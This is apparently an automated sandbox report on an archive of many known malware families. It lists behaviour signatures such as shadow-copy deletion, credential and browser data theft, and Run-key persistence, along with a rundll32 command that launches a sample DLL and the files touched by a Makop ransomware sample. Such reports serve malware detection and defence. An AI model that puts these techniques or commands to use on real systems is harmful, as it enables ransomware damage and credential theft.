Analysis Overview
SHA256
38bc13ef112b2f17d4d1a80243fac6a521b5d58228984aae0752d79487fa3b66
Threat Level: Known bad
The file 241105-dtxrgatbpg_pw_infected.zip was found to be: Known bad.
Malicious Activity Summary
Masslogger family
Djvu family
Revengerat family
Cobaltstrike family
Zloader family
Njrat family
Xmrig family
Xred family
xmrig
Makop family
Detects Zeppelin payload
Makop
M00nd3v_Logger
Hawkeye_reborn family
MassLogger
ModiLoader, DBatLoader
ModiLoader Second Stage
Detected Djvu ransomware
Trickbot
Windows security bypass
Vidar family
RMS
Vidar
QNodeService
Modiloader family
Trickbot family
Phorphiex, Phorpiex
Betabot family
Djvu Ransomware
Bazarbackdoor family
Emotet family
Rms family
Xred
Modifies Windows Defender Real-time Protection settings
MassLogger Main payload
HawkEye Reborn
Emotet
Modifies firewall policy service
BazarBackdoor
Modifies visiblity of hidden/system files in Explorer
BetaBot
M00nd3v_logger family
RevengeRat Executable
Zloader, Terdot, DELoader, ZeusSphinx
Qnodeservice family
njRAT/Bladabindi
Zeppelin family
Phorphiex family
XMRig Miner payload
Remote Service Session Hijacking: RDP Hijacking
Grants admin privileges
ModiLoader Second Stage
Emotet payload
Deletes shadow copies
Renames multiple (8081) files with added filename extension
M00nD3v Logger payload
Renames multiple (174) files with added filename extension
Vidar Stealer
CryptOne packer
ReZer0 packer
Event Triggered Execution: Image File Execution Options Injection
Drops file in Drivers directory
Stops running service(s)
Blocklisted process makes network request
Tries to connect to .bazar domain
Server Software Component: Terminal Services DLL
Modifies Windows Firewall
Blocks application from running via registry modification
Deletes backup catalog
Sets file to hidden
Reads local data of messenger clients
Loads dropped DLL
Uses the VBS compiler for execution
Windows security modification
Credentials from Password Stores: Windows Credential Manager
Modifies file permissions
Drops startup file
ACProtect 1.3x - 1.4x DLL software
Unexpected DNS network traffic destination
Checks computer location settings
ASPack v2.12-2.42
Executes dropped EXE
Checks BIOS information in registry
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Password Policy Discovery
Legitimate hosting services abused for malware hosting/C2
Checks whether UAC is enabled
Adds Run key to start application
Checks installed software on the system
Accesses 2FA software files, possible credential harvesting
Modifies WinLogon
Enumerates connected drives
Indicator Removal: Clear Persistence
Accesses Microsoft Outlook profiles
Looks up external IP address via web service
UPX packed file
Hide Artifacts: Hidden Users
Suspicious use of SetThreadContext
AutoIT Executable
Suspicious use of NtSetInformationThreadHideFromDebugger
Drops file in System32 directory
Launches sc.exe
Drops file in Program Files directory
Drops file in Windows directory
System Location Discovery: System Language Discovery
Unsigned PE
Command and Scripting Interpreter: JavaScript
Browser Information Discovery
Program crash
Permission Groups Discovery: Local Groups
Event Triggered Execution: Netsh Helper DLL
Enumerates physical storage devices
NSIS installer
Suspicious use of WriteProcessMemory
Interacts with shadow copies
Suspicious use of SetWindowsHookEx
Suspicious behavior: AddClipboardFormatListener
NTFS ADS
Enumerates system info in registry
Gathers network information
Suspicious behavior: LoadsDriver
Suspicious behavior: EnumeratesProcesses
Modifies Internet Explorer settings
Scheduled Task/Job: Scheduled Task
Delays execution with timeout.exe
Modifies Internet Explorer Protected Mode
Suspicious use of AdjustPrivilegeToken
Uses Volume Shadow Copy service COM API
outlook_win_path
Suspicious behavior: GetForegroundWindowSpam
Checks SCSI registry key(s)
outlook_office_path
Modifies registry class
Runs net.exe
Suspicious behavior: RenamesItself
Uses Task Scheduler COM API
Modifies Internet Explorer Protected Mode Banner
Runs .reg file with regedit
Suspicious behavior: MapViewOfSection
Uses Volume Shadow Copy WMI provider
Views/modifies file attributes
Kills process with taskkill
Checks processor information in registry
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-12-04 19:32
Signatures
Cobaltstrike family
Detects Zeppelin payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
ModiLoader Second Stage
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Modiloader family
Njrat family
RevengeRat Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Revengerat family
Xred family
Zeppelin family
Zloader family
CryptOne packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
NSIS installer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral20
Detonation Overview
Submitted
2024-12-04 19:31
Reported
2024-12-04 19:36
Platform
win10v2004-20241007-en
Max time kernel
140s
Max time network
158s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\oof.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\oof.exe
"C:\Users\Admin\AppData\Local\Temp\oof.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 180.129.81.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
Files
memory/1180-0-0x0000000002340000-0x0000000002341000-memory.dmp
memory/1180-2-0x0000000002340000-0x0000000002341000-memory.dmp
memory/1180-1-0x0000000000400000-0x00000000004AC000-memory.dmp
Analysis: behavioral30
Detonation Overview
Submitted
2024-12-04 19:31
Reported
2024-12-04 19:36
Platform
win10v2004-20241007-en
Max time kernel
92s
Max time network
157s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\xNet.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 85.49.80.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
Files
Analysis: behavioral32
Detonation Overview
Submitted
2024-12-04 19:31
Reported
2024-12-04 19:36
Platform
win10v2004-20241007-en
Max time kernel
147s
Max time network
154s
Command Line
Signatures
Makop
Makop family
Deletes shadow copies
Renames multiple (8081) files with added filename extension
Deletes backup catalog
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\wbadmin.exe | N/A |
Credentials from Password Stores: Windows Credential Manager
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\1 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe\"" | C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\F: | C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files (x86)\Common Files\Microsoft Shared\ink\ja-JP\TipRes.dll.mui | C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\Office Setup Controller\Office.en-us\PSS10R.CHM | C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_3.6.73.0_x64__8wekyb3d8bbwe\Assets\Wide310x150Logo.scale-200.png | C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxMailAppList.scale-150.png | C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_10.1906.1972.0_x64__8wekyb3d8bbwe\Assets\VoiceRecorderWideTile.contrast-white_scale-100.png | C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.contrast-black_targetsize-256.png | C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxCalendarAppList.targetsize-96_altform-unplated.png | C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\legal\javafx\glib.md | C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherImages\210x173\19.jpg | C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\next-arrow-hover.svg | C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_x64__8wekyb3d8bbwe\Assets\GamesXboxHubWideTile.scale-100_contrast-white.png | C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Smart Tag\LISTS\BASMLA.XSL | C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxMailAppList.targetsize-256_altform-unplated.png | C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-black\MapsAppList.targetsize-24_altform-unplated.png | C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_x64__8wekyb3d8bbwe\Assets\GamesXboxHubAppList.scale-100.png | C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\TrackedSend.aapp | C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Effects\Glossy.eftx | C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxCalendarAppList.scale-150.png | C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\AppList.targetsize-32_altform-lightunplated.png | C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\selection-actions.png | C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\nb-no\ui-strings.js | C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\en-il\ui-strings.js | C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\themes\dark\share_icons.png | C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\lib\deploy\messages_zh_HK.properties | C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_x64__8wekyb3d8bbwe\Assets\ScreenSketchStoreLogo.scale-200_contrast-white.png | C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxCalendarAppList.targetsize-36_altform-unplated.png | C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\en-ae\ui-strings.js | C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\hr-hr\ui-strings.js | C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\pt-br.txt | C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\offsymsl.ttf | C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\Voices\en-GB\en-GB_female_TTS\prompts_en-GB_TTS.lua | C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-black\MediumTile.scale-200_contrast-black.png | C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe | N/A |
| File opened for modification | C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Functions\It.Tests.ps1 | C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Images\Stickers\Thumbnails\Sticker_Icon_Spiral.png | C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\Assets\Audio\Skype_Dtmf_1_Loud.m4a | C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdR_Grace-ppd.xrm-ms | C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\en-il\ui-strings.js | C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Media Player\de-DE\wmlaunch.exe.mui | C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\QuickStyles\basicelegant.dotx | C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_sortedby_up_selected_18.svg | C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\kk.pak.DATA | C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\Assets\HeroAppTile.xml | C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\Spacer\2px.png | C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Multimedia\MPP\Flash.mpp | C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\themes\dark\cloud_secured_lg.png | C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\it-IT\wmlaunch.exe.mui | C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Work\RTL\contrast-black\WideTile.scale-200.png | C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected] | C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\SONORA\THMBNAIL.PNG | C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.4.8204.0_neutral_~_8wekyb3d8bbwe\AppxBlockMap.xml | C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_2020.1906.55.0_neutral_~_8wekyb3d8bbwe\AppxMetadata\AppxBundleManifest.xml | C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsAlarms_10.1906.2182.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\AlarmsLargeTile.contrast-white_scale-125.png | C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_3.6.73.0_x64__8wekyb3d8bbwe\resources.pri | C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\Assets\Audio\Skype_Video_Msg_Record.m4a | C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\AppCS\MemMDL2.1.85.ttf | C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\pt-br\ui-strings.js | C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected] | C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\de-DE\wmlaunch.exe.mui | C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsSoundRecorder_10.1906.1972.0_neutral_split.scale-200_8wekyb3d8bbwe\AppxManifest.xml | C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-black\OneNoteSectionWideTile.scale-100.png | C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\OneNoteNotebookMedTile.scale-400.png | C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\ipsdan.xml | C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_x64__8wekyb3d8bbwe\Assets\GetStartedAppList.targetsize-36_altform-unplated_contrast-black.png | C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe | N/A |
